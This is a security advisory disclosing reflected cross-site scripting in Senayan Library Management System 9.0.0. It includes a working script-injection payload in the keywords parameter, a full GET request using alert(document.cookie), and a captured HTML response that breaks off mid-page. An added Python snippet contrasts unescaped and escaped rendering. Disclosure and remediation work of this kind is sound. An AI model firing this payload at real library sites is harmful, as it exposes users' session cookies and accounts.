Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

SHA-256 | ac897cc657f6fa46fa4932c82d8baab7fcd4d9af7c0755a81ff66e8fa8ae599c

## Title: Senayan Library Management System v9.0.0 a.k.a. SLIMS 9, multiple reflected XSS vulnerabilities
## Author: nu11secur1ty
## Date: 12.09.2022
## Vendor:
## Software:
## Reference:

## Description:
The value of the keywords request parameter is copied into the value of an HTML tag attribute that is enclosed in double quotation marks, so a double quote in the input terminates the attribute early.
The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhc
was submitted in the keywords parameter.
This input was echoed unmodified in the application's response.
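The following is an added illustration, not SLiMS code: it reproduces the attribute-context reflection described above with the advisory's own payload, shows the hardened rendering (the PHP equivalent is htmlspecialchars() with ENT_QUOTES), and parses both outputs the way a browser would to confirm whether the value stayed inside the attribute. The input element and function names are illustrative assumptions.

```python
import html
from html.parser import HTMLParser

# Payload quoted from the advisory's description (value of the keywords parameter).
ADVISORY_PAYLOAD = 'm8vzl"><script>alert(hello_vulnerability)</script>hidhc'


def render_unsafe(keywords: str) -> str:
    """Mirrors the flaw: the parameter is copied verbatim into a double-quoted
    attribute, so a '"' in the input closes the attribute early."""
    return f'<input type="text" name="keywords" value="{keywords}">'


def render_safe(keywords: str) -> str:
    """Hardened form: encode &, <, >, " and ' before placing the value in the
    attribute (PHP: htmlspecialchars($kw, ENT_QUOTES, 'UTF-8'))."""
    return f'<input type="text" name="keywords" value="{html.escape(keywords, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag seen and the attributes of the input element."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)


def analyse(fragment: str) -> dict:
    """Parse a rendered fragment and report whether the reflected text stayed
    inside the value attribute or produced additional elements."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return {
        "tags": parser.tags,
        "value": parser.input_attrs.get("value"),
        "script_injected": "script" in parser.tags,
    }


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(label, analyse(render(ADVISORY_PAYLOAD)))
```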

## STATUS: HIGH Vulnerability

[+] Payload:

GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

[+] Response:

HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 06:23:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29492

# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email: [email protected]
# @Date: 2018-01-23T11:25:57+07:00
# @Last modified by: Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
<!DOCTYPE html>
<meta charset="utf-8">
<title>Open Source Library Management System | Senayan</title>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/>
<meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>

<meta name="description" content="Open Source Library Management System | Senayan">
<meta name="keywords" content="Open Source Library Management System">
<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1">
<meta name="generator" content="SLiMS 9 (Bulian)">
<meta name="theme-color" content="#000">

<meta property="og:locale" content="en_US"/>
<meta property="og:type" content="book"/>
<meta property="og:title" content="Open Source Library Management System | Senayan"/>
<meta property="og:description" content="Open Source Library Management System"/>
<meta property="og:url"
## Reproduce:

## Proof and Exploit:

## Time spent
